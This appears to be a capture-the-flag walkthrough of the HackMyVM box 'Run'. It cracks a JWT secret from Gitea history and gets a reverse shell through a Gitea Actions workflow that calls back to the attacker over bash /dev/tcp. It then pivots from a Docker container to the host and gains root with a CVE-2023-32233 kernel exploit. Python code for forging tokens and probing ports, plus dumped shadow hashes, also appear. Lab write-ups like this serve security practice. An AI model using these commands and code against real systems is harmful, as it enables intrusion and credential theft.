[HackMyVM] Target: Run

kali: 192.168.56.104

Host discovery

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:bb:bb:02       PCS Systemtechnik GmbH
192.168.56.114  08:00:27:a6:14:7c       PCS Systemtechnik GmbH

Target: 192.168.56.114

Port scan

nmap 192.168.56.114
PORT     STATE SERVICE
3000/tcp open  ppp

Only port 3000 is open; the "ppp" label is just nmap's /etc/services guess for that port number.

Opening it in a browser shows a Gitea instance.

Browsing the repositories turns up a Flask JWT auth project.

The jwt_token value has been removed from the current version of the code,

but it is still visible in the commit history:

jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"

Decoding the header and payload (plain base64url, no key needed) shows an HS256 access token for user dev with flask-jwt-extended style claims (fresh, jti, type, csrf) and an exp long in the past, so the token itself is of no use.

Since alg is HS256 the signature is an HMAC with a shared secret, and that secret can be brute-forced offline. Put the token in jwtt.txt and run hashcat in JWT mode (-m 16500) against rockyou:

# hashcat -O -a 0 -m 16500 jwtt.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1906/3876 MB (512 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:developer88

The recovered signing secret is developer88.

The decoded payload names the user as dev (the sub and username claims).

The secret also works as dev's password: log in to Gitea as dev/developer88.
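The cracking step in code, as an added example that is not part of the original write-up: decode the token without any key, brute-force the HS256 secret the way hashcat -m 16500 does (HMAC-SHA256 over the "header.payload" string compared against the signature), and mint a new token once the secret is known. PAGE_TOKEN is the token from the repository history; CANDIDATES is a constructed stand-in for rockyou.txt and DEMO_TOKEN is constructed here so the block runs offline.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop the base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token: str):
    """Header and payload as dicts, signature untouched: reading a JWT needs no key."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)))


def hs256_sig(header_b64: str, payload_b64: str, secret: str) -> bytes:
    # HS256 = HMAC-SHA256 over the ASCII "header.payload" string
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()


def verify_hs256(token: str, secret: str) -> bool:
    header_b64, payload_b64, sig_b64 = token.split(".")
    return hmac.compare_digest(hs256_sig(header_b64, payload_b64, secret),
                               b64url_decode(sig_b64))


def crack_hs256(token: str, candidates):
    """First candidate that reproduces the signature, or None if the wordlist misses."""
    header, _ = decode_unverified(token)
    if header.get("alg") != "HS256":
        # RS256 etc. cannot be cracked this way; refuse rather than burn CPU
        raise ValueError(f"not an HS256 token: alg={header.get('alg')!r}")
    for word in candidates:
        if verify_hs256(token, word):
            return word
    return None


def forge_hs256(payload: dict, secret: str) -> str:
    """Mint a token the server will accept once its secret is known."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"},
                                          separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{payload_b64}.{b64url_encode(hs256_sig(header_b64, payload_b64, secret))}"


def load_wordlist(path: str):
    # rockyou.txt is not clean UTF-8 throughout; latin-1 never fails to decode
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


# Token from the repository history on the page (HS256, user "dev").
PAGE_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"

# Constructed stand-in for rockyou.txt so the demo runs offline.
CANDIDATES = ["password", "gitea", "flask", "secret", "developer", "developer88"]

# Constructed token with the same claim shape as the page's, signed with a CANDIDATES entry.
DEMO_PAYLOAD = {"type": "access", "sub": "dev", "username": "dev",
                "iat": 1707148658, "exp": 1707149258}
DEMO_TOKEN = forge_hs256(DEMO_PAYLOAD, "developer88")


if __name__ == "__main__":
    print("page payload:", decode_unverified(PAGE_TOKEN)[1])
    print("demo secret :", crack_hs256(DEMO_TOKEN, CANDIDATES))
    print("page secret :", crack_hs256(PAGE_TOKEN, CANDIDATES))
    # On the box: crack_hs256(PAGE_TOKEN, load_wordlist("/usr/share/wordlists/rockyou.txt"))
    forged = forge_hs256({**DEMO_PAYLOAD, "exp": DEMO_PAYLOAD["exp"] + 86400}, "developer88")
    print("forged token verifies:", verify_hs256(forged, "developer88"))
```

The alg check is deliberate: a token signed with RS256 has no shared secret to recover, and a server that lets the client pick alg is a different bug from the one this box has. Cracking the secret is only worth doing because a cracked secret lets you sign arbitrary claims, which forge_hs256 shows.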

Create a new repository.

Enable Actions for it under the repository settings.

Create a .gitea/workflows directory and add a workflow file whose only step is a reverse shell:

# mkdir -p .gitea/workflows

┌──(root㉿kali2)-[~/Desktop]
└─# cd .gitea/workflows

┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# vim shell.yaml

┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# cat shell.yaml
name: demo
run-name: ${{ github.actor }} is testing out Gitea Action
on: [push]                 # any push to the repository triggers the job
jobs:
  Explore-Gitea-Actions:
    runs-on: run           # label must match one advertised by a registered runner
    steps:
      - run: /bin/bash -i >& /dev/tcp/192.168.56.104/4567 0>&1   # reverse shell back to Kali
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# mv ~/Desktop/.gitea ~/Desktop/myshell

(myshell is the local clone of the new repository, so the workflow ends up at myshell/.gitea/workflows/shell.yaml.)

A workflow only runs if a runner picks it up, so download act_runner:

Gitea | act_runner

The runner has to be registered against the instance first:

./act_runner register --no-interactive --instance <instance> --token <token>

<instance> is the Gitea URL (the target's IP and port 3000);

the registration token is shown in the settings when adding a runner.

# ./act_runner register --no-interactive --instance http://192.168.56.114:3000 --token ralq3rc5Kw1V20XmovyTG0DKBMc6gQuZybTHMYHC

INFO Registering runner, arch=amd64, os=linux, version=v0.2.6. 
INFO Runner name is empty, use hostname 'kali2'.  
DEBU Successfully pinged the Gitea instance server 
INFO Runner registered successfully. 

Then start the daemon:

./act_runner daemon                                                                                                          
INFO[2024-03-07T22:44:44+08:00] Starting runner daemon                       
INFO[2024-03-07T22:44:44+08:00] runner: kali2, with version: v0.2.6, with labels: [ubuntu-latest ubuntu-22.04 ubuntu-20.04 ubuntu-18.04], declare successfully 

Note the labels: the Kali runner advertises only ubuntu-*, while the workflow asks for runs-on: run. The shell that comes back (below) is from a container on the target's own Docker network, so it is a runner already registered on the target with the run label that executes the job, not this one. With a listener waiting on port 4567, push shell.yaml to the repository:

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.email "dev@run.hmv"

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.name "dev"

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git add .

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git commit -m "Testing"
[main (root-commit) 2708ed7] Testing
 1 file changed, 8 insertions(+)
 create mode 100644 .gitea/workflows/shell.yaml

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git push origin main
Username for 'http://192.168.56.114:3000': dev
Password for 'http://dev@192.168.56.114:3000': 
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 446 bytes | 446.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://192.168.56.114:3000/dev/myshell.git
 * [new branch]      main -> main

The listener on port 4567 gets a shell back.

It is running inside a Docker container, though:

act@41571465a87b:~/cache/actions/e62fd81b2b2325de/hostexecutor$ ip route show
ip route show
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 

First get a stable shell. Inside the container the act user can sudo to root without a password, and script plus stty turn the raw connection into a proper tty:

act@41571465a87b:~/cache/actions/9246c6b12576b1d1/hostexecutor$ sudo su -
sudo su -
script /dev/null -c bash
Script started, output log file is '/dev/null'.
root@41571465a87b:~# ^Z
zsh: suspended  nc -lvnp 4567
                                                                                                                                              
┌──(root㉿kali2)-[~/Desktop]
└─# stty raw -echo;fg
[2]  - continued  nc -lvnp 4567
                               reset
reset: unknown terminal type unknown
Terminal type? xterm

Now get out of the container. This is not a breakout through the container runtime: the route table above shows the container on the 172.18.0.0/16 Docker bridge with 172.18.0.1 as its default gateway, and that gateway is the Docker host itself, reachable over the bridge like any other address.
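The same reconnaissance in code, as an added example that is not from the original post: parse /proc/net/route for the default gateway (inside a bridge-networked container that is the Docker host), collect a couple of container indicators, and probe the gateway for TCP ports that answer. SAMPLE_ROUTE is a constructed route table matching the addresses on the page, and the port list in the main block is an assumption about what is worth trying.

```python
import os
import socket
import struct

# Constructed /proc/net/route content matching the container on the page
# (default via 172.18.0.1 on eth0, 172.18.0.0/16 on-link); not captured from the box.
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t010012AC\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "eth0\t000012AC\t00000000\t0001\t0\t0\t0\t0000FFFF\t0\t0\t0\n"
)

RTF_GATEWAY = 0x0002  # route flag: destination is reached through a gateway


def hex_to_ip(hex_addr: str) -> str:
    """/proc/net/route stores IPv4 addresses as little-endian hex words."""
    return socket.inet_ntoa(struct.pack("<L", int(hex_addr, 16)))


def default_gateway(route_text: str):
    """(iface, gateway) for the default route, or None if there is none."""
    for line in route_text.splitlines()[1:]:      # skip the header line
        fields = line.split()
        if len(fields) < 4:
            continue
        iface, dest, gw, flags = fields[:4]
        if dest == "00000000" and int(flags, 16) & RTF_GATEWAY:
            return iface, hex_to_ip(gw)
    return None


def container_hints():
    """Cheap signs that the shell is inside a container; absence proves nothing
    (cgroup v2 containers often show only '0::/' in /proc/1/cgroup)."""
    hints = []
    if os.path.exists("/.dockerenv"):
        hints.append("/.dockerenv exists")
    try:
        with open("/proc/1/cgroup") as fh:
            if any(k in fh.read() for k in ("docker", "containerd", "kubepods")):
                hints.append("container runtime named in /proc/1/cgroup")
    except OSError:
        pass
    return hints


def tcp_probe(host: str, ports, timeout: float = 0.5):
    """Ports on host that complete a TCP connect; no raw sockets, so it works unprivileged."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


if __name__ == "__main__":
    print("container hints:", container_hints() or "none")
    try:
        with open("/proc/net/route") as fh:
            route_text = fh.read()
    except OSError:
        route_text = SAMPLE_ROUTE   # not on Linux: fall back to the constructed table
    gw = default_gateway(route_text)
    print("default gateway:", gw)
    if gw:
        # Assumed shortlist of services worth checking on the Docker host.
        print("open on gateway:", tcp_probe(gw[1], [22, 80, 443, 2375, 3000, 8080]))
```

On this box the probe would report 22 on 172.18.0.1, which is the SSH hop used next. Port 2375 is in the list because an unauthenticated Docker API on the host would be a far quicker way in than a password.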

SSH to the gateway as dev (the developer88 password works here as well):

root@41571465a87b:~# ssh dev@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
dev@172.18.0.1's password: 


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Tue Feb  6 15:52:41 2024 from 172.18.0.4
dev@run:~$ ls -al
total 32
drwxr-x--- 4 dev  dev  4096 Mar  7 15:16 .
drwxr-xr-x 3 root root 4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root    9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev   220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev  3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev  4096 Mar  7 15:16 .cache
-rw-r--r-- 1 dev  dev   807 Jan  7  2023 .profile
drwx------ 2 dev  dev  4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev    33 Feb  6 16:01 user.txt
dev@run:~$ cat user.txt
56f98bdfaf5186243bc4cb99f0674f58

That gives the user flag.

Check the kernel version:

dev@run:~$ uname -a
Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Searching for 6.2.0-20-generic turns up a local privilege escalation, CVE-2023-32233 (a use-after-free in nf_tables anonymous sets, reachable from an unprivileged user namespace):

Linux Kernel privilege escalation vulnerability (CVE-2023-32233) - Alibaba Cloud developer community (aliyun.com)

openwall.com/lists/oss-security/2023/05/15/5/3

Build the exploit source (exp.c) on Kali with the libmnl/libnftnl headers, then serve the binary to the target:

apt install gcc libmnl-dev libnftnl-dev

gcc -Wall -o exploit exp.c -lmnl -lnftnl

dev@run:~$ wget http://192.168.56.104:6677/exploit
--2024-03-07 15:24:06--  http://192.168.56.104:6677/exploit
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63456 (62K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  61.97K  --.-KB/s    in 0.003s  

2024-03-07 15:24:06 (24.2 MB/s) - ‘exploit’ saved [63456/63456]
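Before running the exploit it is worth confirming what it depends on. The checker below is an added example, not part of the original write-up or of the exploit. The checks follow what the exploit's own output shows (a reserved CPU, uid_map/gid_map/setgroups writes, the kernel.modprobe hijack): enough CPUs to pin the worker, unprivileged user namespaces allowed, and kernel.modprobe still at its default, which is the tell-tale for state left behind by an earlier attempt. The 6.4 cutoff for the upstream fix is an assumption stated in the code; distro kernels backport fixes, so the version check only says whether it is worth looking further.

```python
import os
import re

# Kernel string from the box, as shown by uname -a on the page.
PAGE_KERNEL = "6.2.0-20-generic"
DEFAULT_MODPROBE = "/sbin/modprobe"


def parse_kernel_release(release: str):
    """'6.2.0-20-generic' -> (6, 2, 0, 20); the ABI number defaults to 0 when absent."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi = m.groups()
    return int(major), int(minor), int(patch), int(abi or 0)


def read_text(path: str, default=None):
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return default


def preflight(release, cpu_count, userns_clone, max_userns, nf_tables_loaded, modprobe_path):
    """List of (check, ok, detail); ok=False means the run is likely to fail or waste a reboot."""
    checks = []
    ver = parse_kernel_release(release)[:3]
    # Assumption: the upstream fix landed before 6.4, so mainline >= 6.4 is treated as patched.
    # Distro kernels backport fixes, so anything below that only means "check the package changelog".
    patched = ver >= (6, 4, 0)
    checks.append(("kernel", not patched,
                   f"{release}: " + ("upstream fix included" if patched
                                     else "below 6.4, verify distro changelog")))
    # The exploit reserves a CPU for its PWN worker (the page shows sched_getaffinity() => 0 2).
    checks.append(("cpus", cpu_count >= 2,
                   f"{cpu_count} usable CPU(s), need a core to pin the worker to"))
    # It writes uid_map/gid_map/setgroups, i.e. it needs an unprivileged user namespace.
    checks.append(("userns_clone", userns_clone in (None, "1"),
                   f"kernel.unprivileged_userns_clone={userns_clone} (absent means no such knob)"))
    checks.append(("max_userns", max_userns not in (None, "0"),
                   f"user.max_user_namespaces={max_userns}"))
    # nf_tables may not be loaded yet; the netlink request from the new namespace can autoload it.
    checks.append(("nf_tables", True,
                   "loaded" if nf_tables_loaded else "not loaded yet, may autoload on use"))
    # The final stage hijacks kernel.modprobe; a non-default value means an earlier run already hit it.
    untouched = modprobe_path == DEFAULT_MODPROBE
    checks.append(("modprobe_path", untouched,
                   f"kernel.modprobe={modprobe_path}" + ("" if untouched
                                                         else ", leftover state: reboot first")))
    return checks


def gather_live():
    """Read the same inputs from the running system (Linux paths)."""
    affinity = getattr(os, "sched_getaffinity", None)
    return {
        "release": os.uname().release,
        "cpu_count": len(affinity(0)) if affinity else (os.cpu_count() or 1),
        "userns_clone": read_text("/proc/sys/kernel/unprivileged_userns_clone"),
        "max_userns": read_text("/proc/sys/user/max_user_namespaces"),
        "nf_tables_loaded": os.path.isdir("/sys/module/nf_tables"),
        "modprobe_path": read_text("/proc/sys/kernel/modprobe"),
    }


if __name__ == "__main__":
    for name, ok, detail in preflight(**gather_live()):
        print(f"[{'ok' if ok else '!!'}] {name:14} {detail}")
```

Run it as dev before each attempt; the modprobe_path line is the one that saves time, since a half-successful race can leave kernel.modprobe pointing into /tmp and the next run has no chance until the box is rebooted.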

dev@run:~$ ls -al
total 96
drwxr-x--- 4 dev  dev   4096 Mar  7 15:24 .
drwxr-xr-x 3 root root  4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root     9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev    220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev   3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev   4096 Mar  7 15:16 .cache
-rw-rw-r-- 1 dev  dev  63456 Mar  7 15:22 exploit
-rw-r--r-- 1 dev  dev    807 Jan  7  2023 .profile
drwx------ 2 dev  dev   4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev     33 Feb  6 16:01 user.txt
dev@run:~$ chmod +x exploit
dev@run:~$ ./exploit
[*] Netfilter UAF exploit


Using profile:
========
1                   race_set_slab                   # {0,1}
1572                race_set_elem_count             # k
4000                initial_sleep                   # ms
100                 race_lead_sleep                 # ms
600                 race_lag_sleep                  # ms
100                 reuse_sleep                     # ms
39d240              free_percpu                     # hex
2a8b900             modprobe_path                   # hex
23700               nft_counter_destroy             # hex
347a0               nft_counter_ops                 # hex
a                   nft_counter_destroy_call_offset # hex
ffffffff            nft_counter_destroy_call_mask   # hex
e8e58948            nft_counter_destroy_call_check  # hex
========

[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[... the same PWN Worker sequence repeats four more times, each round ending in status=11 ...]


[*] No ROOT for you:-(
[*] Please reboot the machine!


The exploit is a race against the kernel, so individual runs can fail, and a failed run leaves corrupted kernel objects behind, which is why it asks for a reboot rather than a retry. Reboot the box and run it again.

After several reboots it does succeed:

pwn_uaf_del_obj read_obj_%04hx_ 11
pwn_write_new_obj ffffffff85e8b901
[*] Signaling status=0 to coordinator...
[*] Got status=0 from PWN Worker...
[*] Checking "cat /proc/sys/kernel/modprobe"...
//tmp/modprobe
/tmp/trigger: 1: ����: not found
[*] Checking "/etc/shadow"...
root:$y$j9T$xfElC0tV5a0mSPb1tZ5kq/$2xaoiScyTxIhuB/4AyqQJmtJPIg05GyrM0.xAvTyiPA:19759:0:99999:7:::
daemon:*:19462:0:99999:7:::
bin:*:19462:0:99999:7:::
sys:*:19462:0:99999:7:::
sync:*:19462:0:99999:7:::
games:*:19462:0:99999:7:::
man:*:19462:0:99999:7:::
lp:*:19462:0:99999:7:::
mail:*:19462:0:99999:7:::
news:*:19462:0:99999:7:::
uucp:*:19462:0:99999:7:::
proxy:*:19462:0:99999:7:::
www-data:*:19462:0:99999:7:::
backup:*:19462:0:99999:7:::
list:*:19462:0:99999:7:::
irc:*:19462:0:99999:7:::
_apt:*:19462:0:99999:7:::
nobody:*:19462:0:99999:7:::
systemd-network:!*:19462::::::
systemd-timesync:!*:19462::::::
messagebus:!:19462::::::
systemd-resolve:!*:19462::::::
pollinate:!:19462::::::
syslog:!:19462::::::
uuidd:!:19462::::::
tcpdump:!:19462::::::
tss:!:19462::::::
landscape:!:19462::::::
fwupd-refresh:!:19462::::::
dev:$y$j9T$/vO4x4YorAt9NZFdGFXlW/$3jEHxOuay6gjxpLjnU4qteiI6MlgZ6W/dO1Zzc3VLu/:19759:0:99999:7:::
lxd:!:19758::::::
dnsmasq:!:19758::::::
sshd:!:19759::::::


[*] You've Got ROOT:-)

A root shell follows; the root flag is in /root:

# cat /root/r*

Summary:

        1. JWT signing secret brute-forced with hashcat
        2. Reverse shell from a Gitea Actions workflow
        3. From the Docker container to the host over the bridge gateway
        4. Linux kernel privilege escalation, CVE-2023-32233
